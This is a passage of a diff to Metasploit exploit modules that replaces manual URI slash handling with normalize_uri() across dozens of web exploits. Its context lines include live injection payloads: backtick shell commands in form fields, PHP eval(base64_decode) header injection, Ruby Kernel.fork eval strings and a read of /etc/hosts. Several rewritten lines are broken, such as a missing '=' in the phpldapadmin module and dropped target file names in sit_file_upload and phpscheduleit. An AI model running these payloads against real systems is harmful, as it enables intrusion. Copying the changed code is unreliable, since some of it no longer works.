 		command.gsub!("%20","%2520")

--- a/modules/exploits/multi/http/glassfish_deployer.rb
+++ b/modules/exploits/multi/http/glassfish_deployer.rb
@@ -739,7 +739,7 @@ class Metasploit3 < Msf::Exploit::Remote
 	end
 
 	def my_target_host
-		path        = datastore['PATH']
+		path        = normalize_uri(datastore['PATH'])
 		my_target_host = "http://#{rhost.to_s}:#{rport.to_s}/#{path.to_s}"
 	end
 

--- a/modules/exploits/multi/http/horde_href_backdoor.rb
+++ b/modules/exploits/multi/http/horde_href_backdoor.rb
@@ -59,15 +59,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	def exploit
 		# Make sure the URI begins with a slash
-		uri = datastore['URI']
-		if uri[0,1] != '/'
-			uri = '/' + uri
-		end
-
-		# Make sure the URI ends without a slash, because it's already part of the URI
-		if uri[-1, 1] == '/'
-			uri = uri[0, uri.length-1]
-		end
+		uri = normalize_uri(datastore['URI'])
 
 		function = "passthru"
 		key = Rex::Text.rand_text_alpha(6)

--- a/modules/exploits/multi/http/hp_sitescope_uploadfileshandler.rb
+++ b/modules/exploits/multi/http/hp_sitescope_uploadfileshandler.rb
@@ -87,7 +87,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	def exploit
 		@peer = "#{rhost}:#{rport}"
-		@uri = target_uri.path
+		@uri = normalize_uri(target_uri.path)
 		@uri << '/' if @uri[-1,1] != '/'
 
 		# Create user with empty credentials

--- a/modules/exploits/multi/http/jboss_bshdeployer.rb
+++ b/modules/exploits/multi/http/jboss_bshdeployer.rb
@@ -396,7 +396,7 @@ EOT
 	end
 
 	def query_serverinfo
-		path = datastore['PATH'] + '/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo'
+		path = normalize_uri(datastore['PATH']) + '/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo'
 		res = send_request_raw(
 			{
 				'uri'    => path,
@@ -454,13 +454,13 @@ EOT
 		if (datastore['VERB']== "POST")
 			res = send_request_cgi({
 				'method'	=> datastore['VERB'],
-				'uri'		=> datastore['PATH'] + '/HtmlAdaptor',
+				'uri'		=> normalize_uri(datastore['PATH']) + '/HtmlAdaptor',
 				'data'	=> params
 			})
 		else
 			res = send_request_cgi({
 				'method'	=> datastore['VERB'],
-				'uri'		=> datastore['PATH'] + '/HtmlAdaptor?' + params
+				'uri'		=> normalize_uri(datastore['PATH']) + '/HtmlAdaptor?' + params
 			}, 30)
 		end
 		res

--- a/modules/exploits/multi/http/jboss_deploymentfilerepository.rb
+++ b/modules/exploits/multi/http/jboss_deploymentfilerepository.rb
@@ -278,14 +278,14 @@ EOT
 		if (datastore['VERB'] == "POST")
 			res = send_request_cgi(
 				{
-					'uri'    => datastore['PATH'] + '/HtmlAdaptor',
+					'uri'    => normalize_uri(datastore['PATH']) + '/HtmlAdaptor',
 					'method' => datastore['VERB'],
 					'data'   => data
 				}, 5)
 		else
 			res = send_request_cgi(
 				{
-					'uri'    =>  datastore['PATH'] + '/HtmlAdaptor?' + data,
+					'uri'    =>  normalize_uri(datastore['PATH']) + '/HtmlAdaptor?' + data,
 					'method' => datastore['VERB'],
 				}, 30)
 		end
@@ -309,14 +309,14 @@ EOT
 		if (datastore['VERB'] == "POST")
 			res = send_request_cgi(
 				{
-					'uri'    => datastore['PATH'] + '/HtmlAdaptor',
+					'uri'    => normalize_uri(datastore['PATH']) + '/HtmlAdaptor',
 					'method' => datastore['VERB'],
 					'data'   => data
 				}, 5)
 		else
 			res = send_request_cgi(
 				{
-					'uri'    => datastore['PATH'] + '/HtmlAdaptor;index.jsp?' + data,
+					'uri'    => normalize_uri(datastore['PATH']) + '/HtmlAdaptor;index.jsp?' + data,
 					'method' => datastore['VERB'],
 				}, 30)
 		end
@@ -379,7 +379,7 @@ EOT
 
 
 	def query_serverinfo
-		path = datastore['PATH'] + '/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo'
+		path = normalize_uri(datastore['PATH']) + '/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo'
 		res = send_request_raw(
 			{
 				'uri'    => path,

--- a/modules/exploits/multi/http/jboss_invoke_deploy.rb
+++ b/modules/exploits/multi/http/jboss_invoke_deploy.rb
@@ -232,7 +232,7 @@ EOT
 		replace_params.each { |key, value| data.gsub!(key, value) }
 
 		res = send_request_cgi({
-			'uri'     => target_uri.path,
+			'uri'     => normalize_uri(target_uri.path),
 			'method'  => 'POST',
 			'data'    => data,
 			'headers' =>

--- a/modules/exploits/multi/http/jboss_maindeployer.rb
+++ b/modules/exploits/multi/http/jboss_maindeployer.rb
@@ -181,7 +181,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		if (datastore['VERB'] == "POST")
 			res = send_request_cgi({
 					'method'    => datastore['VERB'],
-					'uri'       => datastore['PATH'] + '/HtmlAdaptor',
+					'uri'       => normalize_uri(datastore['PATH']) + '/HtmlAdaptor',
 					'vars_post' =>
 						{
 							'action'      => 'invokeOpByName',
@@ -194,7 +194,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		else
 			res = send_request_cgi({
 					'method'    => datastore['VERB'],
-					'uri'       => datastore['PATH'] + '/HtmlAdaptor',
+					'uri'       => normalize_uri(datastore['PATH']) + '/HtmlAdaptor',
 					'vars_get' =>
 						{
 							'action'      => 'invokeOpByName',
@@ -280,7 +280,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		print_status("Undeploying #{app_base} ...")
 		res = send_request_cgi({
 			'method'    => datastore['VERB'],
-			'uri'       => datastore['PATH'] + '/HtmlAdaptor',
+			'uri'       => normalize_uri(datastore['PATH']) + '/HtmlAdaptor',
 			'vars_post' =>
 				{
 					'action'      => 'invokeOpByName',
@@ -319,7 +319,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
 
 	def query_serverinfo
-		path = datastore['PATH'] + '/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo'
+		path = normalize_uri(datastore['PATH']) + '/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo'
 		res = send_request_raw(
 			{
 				'uri'    => path

--- a/modules/exploits/multi/http/lcms_php_exec.rb
+++ b/modules/exploits/multi/http/lcms_php_exec.rb
@@ -60,12 +60,7 @@ class Metasploit3 < Msf::Exploit::Remote
 	end
 
 	def target_url
-		uri = datastore['URI']
-
-		# Make sure uri begins with '/'
-		if uri[0] != '/'
-			uri = '/' + uri
-		end
+		uri = normalize_uri(datastore['URI'])
 
 		# Extract two things:
 		# 1. The file path (/index.php), including the base
@@ -81,7 +76,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		if base.empty? or fname.empty? or params.empty?
 			res = send_request_cgi({
 				'method' => 'GET',
-				'uri'    => datastore['URI']
+				'uri'    => normalize_uri(datastore['URI'])
 			}, 20)
 
 			if res and res.code == 200

--- a/modules/exploits/multi/http/log1cms_ajax_create_folder.rb
+++ b/modules/exploits/multi/http/log1cms_ajax_create_folder.rb
@@ -61,7 +61,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
 
 	def check
-		uri = target_uri.path
+		uri = normalize_uri(target_uri.path)
 		uri << '/' if uri[-1, 1] != '/'
 
 		res = send_request_raw({
@@ -78,7 +78,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
 
 	def exploit
-		uri = target_uri.path
+		uri = normalize_uri(target_uri.path)
 		uri << '/' if uri[-1, 1] != '/'
 
 		peer = "#{rhost}:#{rport}"

--- a/modules/exploits/multi/http/mobilecartly_upload_exec.rb
+++ b/modules/exploits/multi/http/mobilecartly_upload_exec.rb
@@ -60,8 +60,9 @@ class Metasploit3 < Msf::Exploit::Remote
 
 
 	def check
-		target_uri.path << '/' if target_uri.path[-1,1] != '/'
-		base = File.dirname("#{target_uri.path}.")
+		uri = normalize_uri(target_uri.path)
+		uri << '/' if uri[-1,1] != '/'
+		base = File.dirname("#{uri}.")
 
 		res = send_request_raw({'uri'=>"#{base}/index.php"})
 		if res and res.body =~ /MobileCartly/
@@ -78,8 +79,9 @@ class Metasploit3 < Msf::Exploit::Remote
 		#
 		# Init target path
 		#
-		target_uri.path << '/' if target_uri.path[-1,1] != '/'
-		base = File.dirname("#{target_uri.path}.")
+		uri = normalize_uri(target_uri.path)
+		uri << '/' if uri[-1,1] != '/'
+		base = File.dirname("#{uri}.")
 
 		#
 		# Configure payload names

--- a/modules/exploits/multi/http/op5_license.rb
+++ b/modules/exploits/multi/http/op5_license.rb
@@ -64,7 +64,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
 		data = 'timestamp=1317050333`ping -c 10 127.0.0.1`&action=install&install=Install';
 		res = send_request_cgi({
-			'uri'     => datastore['URI'],
+			'uri'     => normalize_uri(datastore['URI']),
 			'method'  => 'POST',
 			'proto'   => 'HTTPS',
 			'data'    => data,
@@ -86,7 +86,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		data = 'timestamp=1317050333`' + payload.encoded + '`&action=install&install=Install';
 
 		res = send_request_cgi({
-			'uri'     => datastore['URI'],
+			'uri'     => normalize_uri(datastore['URI']),
 			'method'  => 'POST',
 			'proto'   => 'HTTPS',
 			'data'    => data,

--- a/modules/exploits/multi/http/op5_welcome.rb
+++ b/modules/exploits/multi/http/op5_welcome.rb
@@ -64,7 +64,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
 		data = 'do=do=Login&password=`ping -c 10 127.0.0.1`';
 		res = send_request_cgi({
-			'uri'     => datastore['URI'],
+			'uri'     => normalize_uri(datastore['URI']),
 			'method'  => 'POST',
 			'proto'   => 'HTTPS',
 			'data'    => data,
@@ -86,7 +86,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		data = 'do=do=Login&password=`' + payload.encoded + '`';
 
 		res = send_request_cgi({
-			'uri'     => datastore['URI'],
+			'uri'     => normalize_uri(datastore['URI']),
 			'method'  => 'POST',
 			'proto'   => 'HTTPS',
 			'data'    => data,

--- a/modules/exploits/multi/http/openfire_auth_bypass.rb
+++ b/modules/exploits/multi/http/openfire_auth_bypass.rb
@@ -89,7 +89,7 @@ class Metasploit3 < Msf::Exploit::Remote
 	end
 
 	def check
-		base = target_uri.path
+		base = normalize_uri(target_uri.path)
 		base << '/' if base[-1, 1] != '/'
 
 		path = "#{base}login.jsp"
@@ -156,7 +156,7 @@ class Metasploit3 < Msf::Exploit::Remote
 	end
 
 	def exploit
-		base = target_uri.path
+		base = normalize_uri(target_uri.path)
 		base << '/' if base[-1, 1] != '/'
 
 		plugin_name = datastore['PLUGINNAME'] || rand_text_alphanumeric(8+rand(8))

--- a/modules/exploits/multi/http/php_cgi_arg_injection.rb
+++ b/modules/exploits/multi/http/php_cgi_arg_injection.rb
@@ -65,7 +65,7 @@ class Metasploit3 < Msf::Exploit::Remote
 	# ...
 	#   -s               Display colour syntax highlighted source.
 	def check
-		uri = target_uri.path
+		uri = normalize_uri(target_uri.path)
 
 		uri.gsub!(/\?.*/, "")
 
@@ -101,7 +101,8 @@ class Metasploit3 < Msf::Exploit::Remote
 			]
 
 			qs = args.join()
-			uri = "#{target_uri}?#{qs}"
+			uri = normalize_uri(target_uri)
+			uri = "#{uri}?#{qs}"
 
 			#print_status("URI: #{target_uri}?#{qs}")      # Uncomment to preview URI
 

--- a/modules/exploits/multi/http/php_volunteer_upload_exec.rb
+++ b/modules/exploits/multi/http/php_volunteer_upload_exec.rb
@@ -188,7 +188,7 @@ class Metasploit3 < Msf::Exploit::Remote
 	# The exploit function does exploity things
 	#
 	def exploit
-		base = target_uri.path
+		base = normalize_uri(target_uri.path)
 		base << '/' if base[-1, 1] != '/'
 
 		@peer = "#{rhost}:#{rport}"

--- a/modules/exploits/multi/http/phpldapadmin_query_engine.rb
+++ b/modules/exploits/multi/http/phpldapadmin_query_engine.rb
@@ -61,8 +61,7 @@ class Metasploit3 < Msf::Exploit::Remote
 	end
 
 	def check
-		uri = ''
-		uri << datastore['URI']
+		uri = normalize_uri(datastore['URI'])
 		uri << '/' if uri[-1,1] != '/'
 		uri << 'index.php'
 
@@ -80,8 +79,7 @@ class Metasploit3 < Msf::Exploit::Remote
 	end
 
 	def get_session
-		uri = ''
-		uri << datastore['URI']
+		uri normalize_uri(datastore['URI'])
 		uri << '/' if uri[-1,1] != '/'
 		uri << 'index.php'
 
@@ -125,8 +123,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		data = "cmd=query_engine&query=none&search=1&orderby=#{php_code}\r\n\r\n"
 		session = get_session
 
-		uri = ''
-		uri << datastore['URI']
+		uri normalize_uri(datastore['URI'])
 		uri << '/' if uri[-1,1] != '/'
 		uri << 'cmd.php'
 

--- a/modules/exploits/multi/http/phpscheduleit_start_date.rb
+++ b/modules/exploits/multi/http/phpscheduleit_start_date.rb
@@ -66,11 +66,8 @@ class Metasploit3 < Msf::Exploit::Remote
 		stub = "1').${print('#{signature}')}.${die};#"
 		my_payload = "btnSubmit=1&start_date=#{stub}"
 
-		if datastore['URI'][-1, 1] == "/"
-			uri = datastore['URI'] + "reserve.php"
-		else
-			uri = datastore['URI'] + "/reserve.php"
-		end
+		uri = normalize_uri(datastore['URI'])
+		uri << '/' if uri[-1,1] != '/'
 
 		print_status("Checking uri #{uri}")
 
@@ -96,11 +93,8 @@ class Metasploit3 < Msf::Exploit::Remote
 		stub = "1').${error_reporting(0)}.${eval(base64_decode($_SERVER[HTTP_#{headername.gsub("-", "_")}]))};#"
 		my_payload = "btnSubmit=1&start_date=#{stub}"
 
-		if datastore['URI'][-1, 1] == "/"
-			uri = datastore['URI'] + "reserve.php"
-		else
-			uri = datastore['URI'] + "/reserve.php"
-		end
+		uri = normalize_uri(datastore['URI'])
+		uri << '/' if uri[-1,1] != '/'
 
 		print_status("Sending request for: #{uri}")
 		print_status("Payload embedded in header: #{headername}")

--- a/modules/exploits/multi/http/phptax_exec.rb
+++ b/modules/exploits/multi/http/phptax_exec.rb
@@ -60,8 +60,9 @@ class Metasploit3 < Msf::Exploit::Remote
 
 
 	def check
-		target_uri.path << '/' if target_uri.path[-1,1] != '/'
-		res = send_request_raw({'uri'=>target_uri.path})
+		uri = normalize_uri(target_uri.path)
+		uri << '/' if uri[-1,1] != '/'
+		res = send_request_raw({'uri'=>uri})
 		if res and res.body =~ /PHPTAX by William L\. Berggren/
 			return Exploit::CheckCode::Detected
 		else
@@ -71,12 +72,13 @@ class Metasploit3 < Msf::Exploit::Remote
 
 
 	def exploit
-		target_uri.path << '/' if target_uri.path[-1,1] != '/'
+		uri = normalize_uri(target_uri.path)
+		uri << '/' if uri[-1,1] != '/'
 
 		print_status("#{rhost}#{rport} - Sending request...")
 		res = send_request_cgi({
 			'method'   => 'GET',
-			'uri'      => "#{target_uri.path}drawimage.php",
+			'uri'      => "#{uri}drawimage.php",
 			'vars_get' => {
 				'pdf'    => 'make',
 				'pfilez' => "xxx; #{payload.encoded}"

--- a/modules/exploits/multi/http/plone_popen2.rb
+++ b/modules/exploits/multi/http/plone_popen2.rb
@@ -61,7 +61,7 @@ class Metasploit3 < Msf::Exploit::Remote
 	end
 
 	def check
-		uri = datastore['URI']
+		uri = normalize_uri(datastore['URI'])
 		uri << '/' if uri[-1,1] != '/'
 		uri << 'p_/webdav/xmltools/minidom/xml/sax/saxutils/os/popen2'
 
@@ -77,7 +77,7 @@ class Metasploit3 < Msf::Exploit::Remote
 	end
 
 	def exploit
-		uri = datastore['URI']
+		uri = normalize_uri(datastore['URI'])
 		uri << '/' if uri[-1,1] != '/'
 		uri << 'p_/webdav/xmltools/minidom/xml/sax/saxutils/os/popen2'
 

--- a/modules/exploits/multi/http/pmwiki_pagelist.rb
+++ b/modules/exploits/multi/http/pmwiki_pagelist.rb
@@ -54,7 +54,7 @@ class Metasploit3 < Msf::Exploit::Remote
 	end
 
 	def check
-		uri = datastore['URI']
+		uri = normalize_uri(datastore['URI'])
 		uri += (datastore['URI'][-1, 1] == "/") ? 'pmwiki.php?n=PmWiki.Version' : '/pmwiki.php?n=PmWiki.Version'
 
 		res = send_request_raw(
@@ -73,7 +73,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		header = rand_text_alpha_upper(3)
 		header_append = rand_text_alpha_upper(4)
 
-		uri = datastore['URI']
+		uri = normalize_uri(datastore['URI'])
 		uri += (datastore['URI'][-1, 1] == "/") ? 'pmwiki.php' : '/pmwiki.php'
 
 		res = send_request_cgi({

--- a/modules/exploits/multi/http/qdpm_upload_exec.rb
+++ b/modules/exploits/multi/http/qdpm_upload_exec.rb
@@ -61,8 +61,9 @@ class Metasploit3 < Msf::Exploit::Remote
 	end
 
 	def check
-		target_uri.path << '/' if target_uri.path[-1,1] != '/'
-		base = File.dirname("#{target_uri.path}.")
+		uri = normalize_uri(target_uri.path)
+		uri << '/' if uri[-1,1] != '/'
+		base = File.dirname("#{uri}.")
 
 		res = send_request_raw({'uri'=>"#{base}/index.php"})
 		if res and res.body =~ /<div id\=\"footer\"\>.+qdPM ([\d])\.([\d]).+\<\/div\>/m
@@ -228,8 +229,9 @@ class Metasploit3 < Msf::Exploit::Remote
 	def exploit
 		@peer = "#{rhost}:#{rport}"
 
-		target_uri.path << '/' if target_uri.path[-1,1] != '/'
-		base = File.dirname("#{target_uri.path}.")
+		uri = normalize_uri(target_uri.path)
+		uri << '/' if uri[-1,1] != '/'
+		base = File.dirname("#{uri}.")
 
 		user = datastore['USERNAME']
 		pass = datastore['PASSWORD']

--- a/modules/exploits/multi/http/sflog_upload_exec.rb
+++ b/modules/exploits/multi/http/sflog_upload_exec.rb
@@ -59,8 +59,9 @@ class Metasploit3 < Msf::Exploit::Remote
 
 
 	def check
-		target_uri.path << '/' if target_uri.path[-1,1] != '/'
-		base = File.dirname("#{target_uri.path}.")
+		uri = normalize_uri(target_uri.path)
+		uri << '/' if uri[-1,1] != '/'
+		base = File.dirname("#{uri}.")
 
 		res = send_request_raw({'uri'=>"#{base}/index.php"})
 
@@ -143,8 +144,9 @@ class Metasploit3 < Msf::Exploit::Remote
 	def exploit
 		@peer = "#{rhost}:#{rport}"
 
-		target_uri.path << '/' if target_uri.path[-1,1] != '/'
-		base = File.dirname("#{target_uri.path}.")
+		uri = normalize_uri(target_uri.path)
+		uri << '/' if uri[-1,1] != '/'
+		base = File.dirname("#{uri}.")
 
 		print_status("#{@peer} - Attempt to login as '#{datastore['USERNAME']}:#{datastore['PASSWORD']}'")
 		cookie = do_login(base)

--- a/modules/exploits/multi/http/sit_file_upload.rb
+++ b/modules/exploits/multi/http/sit_file_upload.rb
@@ -64,11 +64,8 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	def check
 
-		if datastore['URI'][-1, 1] == "/"
-			uri = datastore['URI'] + "index.php"
-		else
-			uri = datastore['URI'] + "/index.php"
-		end
+		uri = normalize_uri(datastore['URI'])
+		uri << '/' if uri[-1,1] != '/'
 
 		res = send_request_raw({
 			'uri'     => uri
@@ -90,11 +87,8 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	def retrieve_session(user, pass)
 
-		if datastore['URI'][-1, 1] == "/"
-			uri = datastore['URI'] + "login.php"
-		else
-			uri = datastore['URI'] + "/login.php"
-		end
+		uri = normalize_uri(datastore['URI'])
+		uri << '/' if uri[-1,1] != '/'
 
 		res = send_request_cgi({
 			'uri'     => uri,
@@ -119,11 +113,8 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	def upload_page(session, newpage, contents)
 
-		if datastore['URI'][-1, 1] == "/"
-			uri = datastore['URI'] + "ftp_upload_file.php"
-		else
-			uri = datastore['URI'] + "/ftp_upload_file.php"
-		end
+		uri = normalize_uri(datastore['URI'])
+		uri << '/' if uri[-1,1] != '/'
 
 		boundary = rand_text_alphanumeric(6)
 
@@ -184,11 +175,8 @@ class Metasploit3 < Msf::Exploit::Remote
 	def cmd_shell(cmdpath)
 		print_status("Calling payload: #{cmdpath}")
 
-		if datastore['URI'][-1, 1] == "/"
-			uri = datastore['URI'] + cmdpath
-		else
-			uri = datastore['URI'] + "/#{cmdpath}"
-		end
+		uri = normalize_uri(datastore['URI'])
+		uri << '/' if uri[-1,1] != '/'
 
 		send_request_raw({
 			'uri'	=> uri

--- a/modules/exploits/multi/http/snortreport_exec.rb
+++ b/modules/exploits/multi/http/snortreport_exec.rb
@@ -63,7 +63,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		custom_payload = start << base64_payload << last
 
 		res = send_request_cgi({
-			'uri'       => datastore['URI'],
+			'uri'       => normalize_uri(datastore['URI']),
 			'vars_get'  =>
 			{
 				'target' => custom_payload

--- a/modules/exploits/multi/http/spree_search_exec.rb
+++ b/modules/exploits/multi/http/spree_search_exec.rb
@@ -60,7 +60,7 @@ class Metasploit3 < Msf::Exploit::Remote
 	def exploit
 		command = Rex::Text.uri_encode(payload.raw, 'hex-all')
 		res = send_request_raw({
-			'uri'     => datastore['URI']+ "?search[send][]=eval&search[send][]=Kernel.fork%20do%60#{command}%60end",
+			'uri'     => normalize_uri(datastore['URI']) + "?search[send][]=eval&search[send][]=Kernel.fork%20do%60#{command}%60end",
 			'method'  => 'GET',
 			'headers' =>
 			{

--- a/modules/exploits/multi/http/spree_searchlogic_exec.rb
+++ b/modules/exploits/multi/http/spree_searchlogic_exec.rb
@@ -61,7 +61,7 @@ class Metasploit3 < Msf::Exploit::Remote
 	def exploit
 		command = Rex::Text.uri_encode(payload.raw, 'hex-all')
 
-		urlconfigdir = datastore['URI'] + "api/orders.json?search[instance_eval]=Kernel.fork%20do%60#{command}%60end"
+		urlconfigdir = normalize_uri(datastore['URI']) + '/' + "api/orders.json?search[instance_eval]=Kernel.fork%20do%60#{command}%60end"
 		res = send_request_raw({
 			'uri'     => urlconfigdir,
 			'method'  => 'GET',

--- a/modules/exploits/multi/http/struts_code_exec.rb
+++ b/modules/exploits/multi/http/struts_code_exec.rb
@@ -71,7 +71,8 @@ class Metasploit3 < Msf::Exploit::Remote
 	end
 
 	def execute_command(cmd, opts = {})
-		uri =  Rex::Text::uri_encode(datastore['URI'])
+		uri =normalize_uri(datastore['URI'])
+		uri =  Rex::Text::uri_encode(uri)
 		var_a = rand_text_alpha_lower(4)
 		var_b = rand_text_alpha_lower(2)
 		var_c = rand_text_alpha_lower(4)

--- a/modules/exploits/multi/http/sun_jsws_dav_options.rb
+++ b/modules/exploits/multi/http/sun_jsws_dav_options.rb
@@ -122,7 +122,7 @@ class Metasploit3 < Msf::Exploit::Remote
 				'method'  => 'OPTIONS',
 				'proto'   => 'HTTP',
 				'version' => '1.0',
-				'uri'     => datastore['PATH']
+				'uri'     => normalize_uri(datastore['PATH'])
 			}, 5)
 
 		info = http_fingerprint({ :response => res })  # check method

--- a/modules/exploits/multi/http/testlink_upload_exec.rb
+++ b/modules/exploits/multi/http/testlink_upload_exec.rb
@@ -59,7 +59,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	def check
 
-		base  = target_uri.path
+		base  = normalize_uri(target_uri.path)
 		base << '/' if base[-1, 1] != '/'
 		peer = "#{rhost}:#{rport}"
 
@@ -152,7 +152,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	def exploit
 
-		base  = target_uri.path
+		base  = normalize_uri(target_uri.path)
 		base << '/' if base[-1, 1] != '/'
 		@peer = "#{rhost}:#{rport}"
 		datastore['COOKIE'] = "PHPSESSID="+rand_text_alpha_lower(26)+";"

--- a/modules/exploits/multi/http/tomcat_mgr_deploy.rb
+++ b/modules/exploits/multi/http/tomcat_mgr_deploy.rb
@@ -203,7 +203,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		#
 		# UPLOAD
 		#
-		path_tmp = datastore['PATH'] + "/deploy" + query_str
+		path_tmp = normalize_uri(datastore['PATH']) + "/deploy" + query_str
 		print_status("Uploading #{war.length} bytes as #{app_base}.war ...")
 		res = send_request_cgi({
 			'uri'          => path_tmp,
@@ -252,7 +252,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		#
 		# DELETE
 		#
-		path_tmp = datastore['PATH'] + "/undeploy" + query_str
+		path_tmp = normalize_uri(datastore['PATH']) + "/undeploy" + query_str
 		print_status("Undeploying #{app_base} ...")
 		res = send_request_cgi({
 			'uri'          => path_tmp,
@@ -268,7 +268,7 @@ class Metasploit3 < Msf::Exploit::Remote
 	end
 
 	def query_serverinfo()
-		path = datastore['PATH'] + '/serverinfo'
+		path = normalize_uri(datastore['PATH']) + '/serverinfo'
 		res = send_request_raw(
 			{
 				'uri'   => path

--- a/modules/exploits/multi/http/traq_plugin_exec.rb
+++ b/modules/exploits/multi/http/traq_plugin_exec.rb
@@ -58,8 +58,8 @@ class Metasploit3 < Msf::Exploit::Remote
 	end
 
 	def check
-		uri = datastore['URI']
-		uri += (datastore['URI'][-1, 1] == "/") ? "admincp/login.php" : "/admincp/login.php"
+		uri = normalize_uri(datastore['URI'])
+		uri += (uri[-1, 1] == "/") ? "admincp/login.php" : "/admincp/login.php"
 
 		res = send_request_raw(
 			{
@@ -75,8 +75,8 @@ class Metasploit3 < Msf::Exploit::Remote
 	def exploit
 		p = Rex::Text.encode_base64(payload.encoded)
 
-		uri = datastore['URI']
-		uri += (datastore['URI'][-1, 1] == "/") ? "admincp/plugins.php?newhook" : "/admincp/plugins.php?newhook"
+		uri = normalize_uri(datastore['URI'])
+		uri += (uri[-1, 1] == "/") ? "admincp/plugins.php?newhook" : "/admincp/plugins.php?newhook"
 
 		res = send_request_cgi(
 			{
@@ -92,8 +92,8 @@ class Metasploit3 < Msf::Exploit::Remote
 					}
 			}, 25)
 
-		uri = datastore['URI']
-		uri += (datastore['URI'][-1, 1] == "/") ? "index.php" : "/index.php"
+		uri = normalize_uri(datastore['URI'])
+		uri += (uri[-1, 1] == "/") ? "index.php" : "/index.php"
 
 		res = send_request_cgi(
 			{

--- a/modules/exploits/multi/http/vbseo_proc_deutf.rb
+++ b/modules/exploits/multi/http/vbseo_proc_deutf.rb
@@ -55,8 +55,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		flag = rand_text_alpha(rand(10)+10)
 		data = "char_repl='{${print(#{flag})}}'=>"
 
-		uri = ''
-		uri << datastore['URI']
+		uri = normalize_uri(datastore['URI'])
 		uri << '/' if uri[-1,1] != '/'
 		uri << 'vbseocp.php'
 
@@ -83,8 +82,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
 		data = "char_repl='{${eval(base64_decode($_SERVER[HTTP_CODE]))}}.{${die()}}'=>"
 
-		uri = ''
-		uri << datastore['URI']
+		uri = normalize_uri(datastore['URI'])
 		uri << '/' if uri[-1,1] != '/'
 		uri << 'vbseocp.php'
 

--- a/modules/exploits/multi/http/webpagetest_upload_exec.rb
+++ b/modules/exploits/multi/http/webpagetest_upload_exec.rb
@@ -59,8 +59,9 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	def check
 		peer = "#{rhost}:#{rport}"
-		target_uri.path << '/' if target_uri.path[-1,1] != '/'
-		base = File.dirname("#{target_uri.path}.")
+		uri = normalize_uri(target_uri.path)
+		uri << '/' if uri[-1,1] != '/'
+		base = File.dirname("#{uri}.")
 
 		res1 = send_request_raw({'uri'=>"#{base}/index.php"})
 		res2 = send_request_raw({'uri'=>"#{base}/work/resultimage.php"})
@@ -93,8 +94,9 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	def exploit
 		peer = "#{rhost}:#{rport}"
-		target_uri.path << '/' if target_uri.path[-1,1] != '/'
-		base = File.dirname("#{target_uri.path}.")
+		uri = normalize_uri(target_uri.path)
+		uri << '/' if uri[-1,1] != '/'
+		base = File.dirname("#{uri}.")
 
 		p = payload.encoded
 		fname = "blah.php"

--- a/modules/exploits/multi/http/wikka_spam_exec.rb
+++ b/modules/exploits/multi/http/wikka_spam_exec.rb
@@ -67,9 +67,10 @@ class Metasploit3 < Msf::Exploit::Remote
 
 
 	def check
+		uri = normalize_uri(target_uri.path)
 		res = send_request_raw({
 			'method' => 'GET',
-			'uri'    => "#{target_uri.path}wikka.php?wakka=HomePage"
+			'uri'    => "#{uri}/wikka.php?wakka=HomePage"
 		})
 
 		if res and res.body =~ /Powered by WikkaWiki/
@@ -209,7 +210,7 @@ class Metasploit3 < Msf::Exploit::Remote
 	def exploit
 		@peer = "#{rhost}:#{rport}"
 
-		@base = target_uri.path
+		@base = normalize_uri(target_uri.path)
 		@base << '/' if @base[-1, 1] != '/'
 
 		print_status("#{@peer} - Getting cookie")

--- a/modules/exploits/multi/php/php_unserialize_zval_cookie.rb
+++ b/modules/exploits/multi/php/php_unserialize_zval_cookie.rb
@@ -214,7 +214,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		# Pick the URI and Cookie name
 		#
 		cookie_name = datastore['COOKIENAME'] || target['DefaultCookie']
-		uri_path    = datastore['URI']        || target['DefaultURI']
+		uri_path    = normalize_uri(datastore['URI']) || target['DefaultURI']
 
 		if(not cookie_name)
 			fail_with(Exploit::Failure::Unknown, "The COOKIENAME option must be set")
@@ -318,7 +318,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		# Pick the URI and Cookie name
 		#
 		cookie_name = datastore['COOKIENAME'] || target['DefaultCookie']
-		uri_path    = datastore['URI']        || target['DefaultURI']
+		uri_path    = normalize_uri(datastore['URI']) || target['DefaultURI']
 
 		if(not cookie_name)
 			fail_with(Exploit::Failure::Unknown, "The COOKIENAME option must be set")

--- a/modules/exploits/unix/webapp/awstats_configdir_exec.rb
+++ b/modules/exploits/unix/webapp/awstats_configdir_exec.rb
@@ -61,7 +61,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	def check
 		res = send_request_cgi({
-			'uri'      => datastore['URI'],
+			'uri'      => normalize_uri(datastore['URI']),
 			'vars_get' =>
 			{
 				'configdir' => '|echo;cat /etc/hosts;echo|'
@@ -77,7 +77,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	def exploit
 		command = Rex::Text.uri_encode(payload.encoded)
